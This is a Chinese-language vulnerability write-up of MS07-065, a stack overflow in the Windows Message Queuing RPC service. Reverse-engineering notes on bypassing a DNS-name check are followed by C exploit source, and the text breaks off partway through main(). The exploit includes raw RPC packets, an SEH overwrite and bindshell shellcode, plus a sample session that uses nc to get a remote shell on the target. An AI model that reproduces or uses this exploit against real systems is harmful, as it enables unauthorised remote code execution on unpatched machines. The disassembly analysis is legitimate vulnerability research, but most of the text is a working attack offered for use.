Author: axis
Date: 2007-12-17
Team: http://www.ph4nt0m.org
Text Mode
微软的补丁链接
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
根据ZDI的漏洞描述:
The specific flaw exists in the RPC interface defined on port 2103 with
UUID fdb3a030-065f-11d1-bb9b-00a024ea5525. During the processing of
opnum 0x06 the service copies user-supplied information into a fixed
length stack buffer. Sending at least 300 bytes will trigger a stack
based buffer overflow due to a vulnerable wcscat() call. Exploitation
of this issue can result in arbitrary code execution.
漏洞是在UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 的第6个调用引起的。最终通过一个 wcscat()的拷贝造成一个栈溢出.
查找了一下关于这个接口的一些定义
http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html
The Message Queuing service (msmq) runs RPC services, listening on the ncacn_ip_tcp transport. By default, the msmq services opens 4 TCP ports [81], including one or several of 2101/tcp, 2103/tcp, 2105/tcp and 2107/tcp.
The mqqm.dll (Windows NT MQ Queue Manager) DLL, loaded in the mqsvc.exe process, contains the following RPC services:
fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
76d12b80-3467-11d3-91ff-0090272f9ea3 v1.0
1088a980-eae5-11d0-8d9b-00a02453c337 v1.0
5b5b3580-b0e0-11d1-b92d-0060081e87f0 v1.0
41208ee0-e970-11d1-9b9e-00e02c064c39 v1.0
Table 4.49. qmcomm operations
Interface | Operation number | Operation name |
fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0: qmcomm |
|
|
| 0x00 | QMOpenQueue |
| 0x01 | QMGetRemoteQueueName |
| 0x02 | QMOpenRemoteQueue |
| 0x03 | QMCloseRemoteQueueContext |
| 0x04 | QMCreateRemoteCursor |
| 0x05 | QMSendMessageInternal |
| 0x06 | QMCreateObjectInternal |
。。。。。。
事实上,这个服务运行在2101、2103、2105、2107端口,根据我后来的结果可以看到,这些端口都能够直接溢出
这个漏洞被微软标记为important,因为在2003偷偷修复了,在xp和2000 professional版本上,这个漏洞利用时候需要验证用户密码,只有在2000 server上,才能够无须身份验证的触发溢出。
Windows默认是没有装这个服务的,要安装这个服务可以在添加删除程序里,选择添加windows组件。
如果是英文版的系统,那么这里可能叫做 Message Queuing
安装完之后,可以通过 net start msmq 来启动服务。
服务的进程是 mqsvc.exe, 而服务是在 mqqm.dll 中,所以我们可以反汇编这个dll文件
用IDA反汇编mqqm.dll后,用mida插件逆向出RPC调用
导出IDL文件后,可以看到函数结构如下:
/* opcode: 0x06, address: 0x613B5F03 */
long _QMCreateObjectInternal (
[in] long arg_1,
[in][string] wchar_t * arg_2,
[in][range(0,524288)] long arg_3,
[in][unique][size_is(arg_3)] char * arg_4,
[in][range(1,128)] long arg_5,
[in][size_is(arg_5)] long arg_6[],
[in][size_is(arg_5)] struct struct_4 arg_7[]
);
这个函数结构暂时先不管他,也可以自己重新构造了一个IDL文件.
通过IDA看 _QMCreateObjectInternal 函数,没过多久就看出了问题所在
在 QMCreatePrivateQueue 中的 ReplaceDNSNameWithNetBiosName 中,没有对输入进行充分检查,wcscat()导致了一个栈溢出。
; int __cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z proc near
Str= dword ptr 4
Dest= dword ptr 8
push esi
push 5Ch ; Ch
push [esp+8+Str] ; Str
call ds:__imp__wcschr
pop ecx
mov esi, eax
pop ecx
push ?g_szMachineName@@3PAGA ; Source
push [esp+8+Dest] ; Dest
call ds:__imp__wcscpy
pop ecx
pop ecx
push esi ; Source
push [esp+8+Dest] ; Dest
call ds:__imp__wcscat // 溢出
pop ecx
pop ecx
pop esi
retn
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z endp
伪代码:
wchar_t *__cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
{
wchar_t *v3; // esi@1
v3 = _wcschr(Str, 0x5Cu);
_wcscpy(Dest, g_szMachineName);
return _wcscat(Dest, v3);
}
这里我们后面再回过头来看。
那么,函数调用是这样的:
_QMCreateObjectInternal
|---------------QMCreatePrivateQueue
|-------------------ReplaceDNSNameWithNetBiosName
_QMCreateObjectInternal的伪代码为:
signed int __thiscall QMCreateObjectInternal(struct _RTL_CRITICAL_SECTION *this, RPC_BINDING_HANDLE Binding, unsigned int Type, wchar_t *Str, int a5, int a6, int a7, int a8, int a9)
{
__int32 v10; // edi@6
__int32 v11; // eax@7
int v12; // ST18_4@9
struct _RTL_CRITICAL_SECTION *v13; // [sp+4h] [bp-10h]@1
int v14; // [sp+10h] [bp-4h]@4
v13 = this;
if ( a5 && !a6 )
{
LogMsgHR(-1072824314, off_6B27271C, 0x125u);
return -1072824314;
}
v13 = &qmcmd_cs;
EnterCriticalSection(&qmcmd_cs);
v14 = 0;
if ( Type == 1 )
{
v12 = 1;
goto LABEL_14;
}
if ( Type == 2 )
{
Type = 0;
v11 = I_RpcBindingInqTransportType(Binding, &Type);
if ( v11 )
goto LABEL_20;
if ( Type == 4 )
{
v12 = 0;
LABEL_14:
v10 = CQPrivate__QMCreatePrivateQueue(Str, a5, a6, a7, a8, a9, v12);
goto LABEL_15;
}
if ( v11 )
LABEL_20:
LogMsgRPCStatus(v11, off_6B27271C, 0x28u);
LeaveCriticalSection(&qmcmd_cs);
return -1072824283;
}
v10 = -1072824319;
LABEL_15:
if ( v10 < 0 )
LogMsgHR(v10, off_6B27271C, 0x32u);
LeaveCriticalSection(&qmcmd_cs);
return v10;
}
============= 这是华丽的分割线 ================
首先要调用到 QMCreatePrivateQueue .
我们看到以下是依次是 _QMCreateObjectInternal的六个参数
Type= dword ptr 0Ch
Str= dword ptr 10h
arg_C= dword ptr 14h
arg_10= dword ptr 18h
arg_14= dword ptr 1Ch
arg_18= dword ptr 20h
arg_1C= dword ptr 24h
看以下代码片段
loc_6B22555B: ; CCriticalSection qmcmd_cs
mov esi, offset ?qmcmd_cs@@3VCCriticalSection@@A
push esi ; lpCriticalSection
mov [ebp+var_10], esi
call ds:__imp__EnterCriticalSection@4 ; EnterCriticalSection(x)
mov eax, [ebp+Type]
mov [ebp+var_4], ebx
dec eax
jz short loc_6B2255C1
在代码中,如果eax为1,dec eax后条件为真,会跳转到QMCreatePrivateQueue 去执行
而eax是由mov eax, [ebp+Type]传入的
所以要让流程走到QMCreatePrivateQueue
_QMCreateObjectInternal的第一个参数必须是为0x00000001
以下是 QMCreatePrivateQueue的调用
loc_6B2255C3: ; int
push [ebp+arg_1C]
mov ecx, offset ?g_QPrivate@@3VCQPrivate@@A ; CQPrivate g_QPrivate
push [ebp+arg_18] ; int
push [ebp+arg_14] ; int
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
call ?QMCreatePrivateQueue@CQPrivate@@QAEJPBGKPAXKQAKQAUtagPROPVARIANT@@H@Z ; CQPrivate::QMCreatePrivateQueue(ushort const *,ulong,void *,ulong,ulong * const,tagPROPVARIANT * const,int)
实际上,我们在后面可以看到,漏洞是由于QMCreatePrivateQueue的第一个参数,也就是_QMCreateObjectInternal的第二个参数所造成的。
进入QMCreatePrivateQueue 之后,我们要调用到 ReplaceDNSNameWithNetBiosName.
以下是代码片段
.text:6B2178A9 mov eax, offset sub_6B25BE64
.text:6B2178AE call __EH_prolog
.text:6B2178B3 sub esp, 138h
.text:6B2178B9 push ebx
.text:6B2178BA push esi
.text:6B2178BB mov esi, [ebp+8]
.text:6B2178BE lea eax, [ebp-1Ch]
.text:6B2178C1 push edi
.text:6B2178C2 push eax ; int
.text:6B2178C3 mov [ebp-18h], ecx
.text:6B2178C6 push esi ; Source
.text:6B2178C7 call ?IsPathnameForLocalMachine@@YAHPBGPAH@Z ; IsPathnameForLocalMachine(ushort const *,int *)
.text:6B2178CC xor ebx, ebx ; ebx 清0
.text:6B2178CE pop ecx
.text:6B2178CF cmp eax, ebx ; 比较ispath函数的返回值
.text:6B2178D1 pop ecx
.text:6B2178D2 jnz short loc_6B2178EC ; 这里有个判断
.text:6B2178EC cmp [ebp-1Ch], ebx ; 这里有个判断
.text:6B2178EF jz short loc_6B217906
.text:6B2178F1 lea eax, [ebp-144h] ; 在栈上
.text:6B2178F7 push eax ; Dest
.text:6B2178F8 push esi ; Str 我们传入的参数
.text:6B2178F9 call ?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z ; ReplaceDNSNameWithNetBiosName(ushort const *,ushort *)
========== 这是聪明的分割线 ============
要走到 ReplaceDNSNameWithNetBiosName ,就需要先绕过 IsPathnameForLocalMachine 这个函数。 我在绕过这个函数上走了很多弯路,花了许多功夫。
看看IsPathnameForLocalMachine函数:
中间分析过程很多,这里我就拿重要的说
mov eax, offset sub_6B25D54C
call __EH_prolog
sub esp, 204h
push ebx
push esi
lea eax, [ebp+String1]
push edi
push eax ; Dest
push [ebp+Source] ; Source
call ?ExtractMachineName@@YAXPBGPAG@Z ; ExtractMachineName(ushort const *,ushort *)
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov esi, ds:__imp__CompareStringW@24 ; CompareStringW(x,x,x,x,x,x)
and dword ptr [eax], 0
push 0FFFFFFFFh ; cchCount2
push ?g_szMachineName@@3PAGA ; lpString2
lea eax, [ebp+String1]
mov edi, 800h
push 0FFFFFFFFh ; cchCount1
push eax ; lpString1
push 1 ; dwCmpFlags
push edi ; Locale
call esi ; CompareStringW(x,x,x,x,x,x) ; CompareStringW(x,x,x,x,x,x)
dec eax
dec eax
jnz short loc_6B2344E9
ExtractMachineName(ushort const *,ushort *) 这个函数把\x5c 就是斜杠前的名字,就是机器名拷贝到某处,所以我们的传入参数里要有斜杠。
然后CompareStringW(x,x,x,x,x,x) 函数,把我们传入的斜杠前的那部分和 机器名比较,这里机器名是通过
push ?g_szMachineName@@3PAGA ; lpString2
取得的,所以是一个定值。
对比完后,我们要让返回值不能为2,因为要跳转到下面的地方:
loc_6B2344E9:
lea eax, [ebp+String1]
push 2Eh ; Ch
push eax ; Str
call ds:__imp__wcschr
pop ecx
test eax, eax
pop ecx
jz loc_6B2345DD
这里会把刚才斜杠前的那部分拿来比较,看中间有没有点,我们要让跳转条件非真,所以我们的传入参数中要带一个“.” 就是\x2e
然后我们控制流程来到
push ?g_szMachineName@@3PAGA ; Str
mov ebx, ds:__imp__wcslen
call ebx ; __imp__wcslen
pop ecx
push eax ; cchCount2
mov eax, ?g_szMachineName@@3PAGA ; ushort * g_szMachineName
push eax ; lpString2
push eax ; Str
call ebx ; __imp__wcslen
pop ecx
push eax ; cchCount1
lea eax, [ebp+String1]
push eax ; lpString1
push 1 ; dwCmpFlags
push edi ; Locale
call esi ; CompareStringW(x,x,x,x,x,x) ; CompareStringW(x,x,x,x,x,x)
dec eax
dec eax
jnz loc_6B2345DD
这里再次把机器名和我们传入的参数比较了一次, 这时候要让跳转条件不成立
流程继续走到
.text:6B234531 push ?g_szMachineName@@3PAGA ; Str
.text:6B234537 call ebx ; __imp__wcslen
.text:6B234539 cmp [ebp+eax*2+String1], 2Eh
.text:6B234542 pop ecx
.text:6B234543 jnz loc_6B2345DD
.text:6B234549 mov eax, ?g_szComputerDnsName@@3V?$AP@G@@A ; AP<ushort> g_szComputerDnsName
.text:6B23454E test eax, eax
.text:6B234550 jz short loc_6B234570
.text:6B234552 lea ecx, [ebp+String1]
.text:6B234558 push ecx ; Str2
.text:6B234559 push eax ; Str1
.text:6B23455A call ds:__imp___wcsicmp ;比较字符串
.text:6B234560 pop ecx
.text:6B234561 test eax, eax
.text:6B234563 pop ecx
.text:6B234564 jnz short loc_6B234570 ; 这里不能跳转
.text:6B234566 mov ecx, [ebp+arg_4]
.text:6B234569 push 1
.text:6B23456B pop eax
.text:6B23456C mov [ecx], eax
.text:6B23456E jmp short loc_6B2345DF
注意这里
mov eax, ?g_szComputerDnsName@@3V?$AP@G@@A ; AP<ushort> g_szComputerDnsName
test eax, eax
jz short loc_6B234570
这个dns name是从机器中取的
.text:6B234552 lea ecx, [ebp+String1]
.text:6B234558 push ecx ; Str2
.text:6B234559 push eax ; Str1
.text:6B23455A call ds:__imp___wcsicmp
然后马上比较两个串是否相同。
根据我们的流程需要,最后要走到
mov ecx, [ebp+arg_4]
push 1
pop eax
mov [ecx], eax
jmp short loc_6B2345DF
然后这个天杀的 IsPathnameForLocalMachine 就总算返回为真了,而且我们同时绕过了以下两处的判断:
.text:6B2178CF cmp eax, ebx ; 比较ispath函数的返回值
.text:6B2178D1 pop ecx
.text:6B2178D2 jnz short loc_6B2178EC ; 这里有个判断
.text:6B2178EC cmp [ebp-1Ch], ebx ; 这里有个判断
.text:6B2178EF jz short loc_6B217906
从而让函数流程顺利的执行到了 ReplaceDNSNameWithNetBiosName
小结下绕过 IsPathnameForLocalMachine 的条件:
1. 要发送个 目标机器的dnsname 加上 一个斜杠 \
2. 要是unicode字符串发送dnsname
实际上从 ReplaceDNSNameWithNetBiosName 这个函数的名字也可以看出来,是要把DNS name替换为 机器名。
同时也可以看出来这个漏洞的利用条件: 需要知道目标机器的dnsname。
一般如果机器在域里面,那就是域后缀。
如下图:
我的机器名是: a-dda41398f44f4
DNS后缀是: .fuck
注意这个“.”很重要,在触发条件中是一定要的。
========= 这是要抓狂的分割线 =================
现在回过头来看 ReplaceDNSNameWithNetBiosName 的代码:
push esi
push 5Ch ; Ch
push [esp+8+Str] ; Str
call ds:__imp__wcschr
pop ecx
mov esi, eax
pop ecx
push ?g_szMachineName@@3PAGA ; Source
push [esp+8+Dest] ; Dest
call ds:__imp__wcscpy
pop ecx
pop ecx
push esi ; Source
push [esp+8+Dest] ; Dest
call ds:__imp__wcscat
就是把 \ 后面的字符串,wcscat到 机器名后面, 而这个拷贝发生在栈上,没有做长度检查,发生了栈溢出。
最后我使用覆盖seh 的方法利用成功发送超过2000 bytes字节的stub,保证覆盖到栈底触发异常,然后call ebx执行shellcode
下面是一个装B的exploit,只适用于我的机器(机器名是a-dda41398f44f4 , dns 后缀是.fuck ),如果你要修改,需要考虑到机器名的不同带来的影响,要重新计算payload长度值. 为啥说这是装B的exploit呢,因为明明有更清晰的exploit写法我不写,要写个可以忽悠很多人的。所以说大家要是以前看到过这种exploit写法又看不懂,那不要灰心,那个人只是和我一样在装B而已!
Exploit运行效果:
Shellcode 使用exitthread退出线程,则可以反复溢出,如果使用seh退出,则会反复执行你的shellcode
======== 这是装B的分割线 ===============
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>exit
exit
sent 5, rcvd 109: NOTSOCK
D:\>
*/
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
// RPC Request Opnum: 0x06
char request_1[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00, // target's dns name (unicode)
0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
void usage(char *argv) {
printf(" Usage: %s -h 127.0.0.1 (Universal exploit)\n",argv);
printf(" %s -h host [-p port]\n",argv);
printf(" Targets:\n");
exit(1);
}
/************* TCP connect *************************/
void Disconnect(SOCKET s);
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
/****************************************************/
int main(int argc, char * argv[]){
unsigned char * target = NULL;
int port = 2103;
int i;
int ret;
char buffer[6000] = {0};
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf("--------------------------------------------------------------------------\n\n");
if (argc==1) usage(argv[0]); //Handle parameters
for(i=1;i<argc;i++) {
if ( (argv[i][0]=='-') ) {
switch (argv[i][1]) {
case 'h':
target=(unsigned char *)argv[i+1];
break;
case 'p':
if (strcmp(argv[i+1],"2103")==0) {
printf("[+] Attacking default port 2103\n");
} else {
port=atoi(argv[i+1]);
}
break;
default:
printf("[-] Invalid argument: %s\n",argv[i]);
usage(argv[0]);
break;
}
i++;
} else usage(argv[0]);
}
/********************** attack payload ***************************/
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, "[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
//Sleep(1200);
s = Make_Connection((char *)target, port, 10);
if(s<0)
{
fprintf(stderr, "[-] connect err.\n");
exit(1);
}
//Send our evil Payload
printf("[*]Sending our Payload, Good Luck! ^_^\n");
printf("[*]Sending RPC Bind String!\n");
